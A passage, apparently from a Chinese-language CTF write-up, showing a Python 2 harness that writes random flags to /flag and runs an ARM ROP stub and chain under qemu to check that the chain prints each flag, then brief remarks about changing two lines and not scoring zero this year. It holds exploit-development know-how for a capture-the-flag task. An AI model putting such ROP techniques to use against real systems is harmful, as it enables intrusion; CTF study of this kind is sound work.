    os.chmod('test/rop_stub', 0755)
    
    for i in xrange(10):
        flag = ''.join([random.choice(string.letters+string.digits) for _ in xrange(random.randint(16,64))])
        with file('/flag', 'wb') as f:
            f.write(flag)
        # p = subprocess.Popen(['chroot', '--userspec=65534:65534', './test', '/rop_stub', str(rop_memfd.fileno()), 'ropchain'], stdin=open('/dev/null'), stdout=subprocess.PIPE, stderr=open('/dev/null', 'w'))
        p = subprocess.Popen(['qemu-arm-static', 'test/rop_stub', str(rop_memfd.fileno()), 'test/ropchain'], stdin=open('/dev/null'), stdout=subprocess.PIPE, stderr=open('/dev/null', 'w'))
        
        output, _ = p.communicate()
        print 'Test %d: %d "%s" "%s"' % (i, p.returncode, output, flag)
        if p.returncode != 0:
            return False
        if output != flag:
            return False
    return True

其实就改了两行：

测试效果：

总结

今年总算是没有爆0了，也算是小小的进步把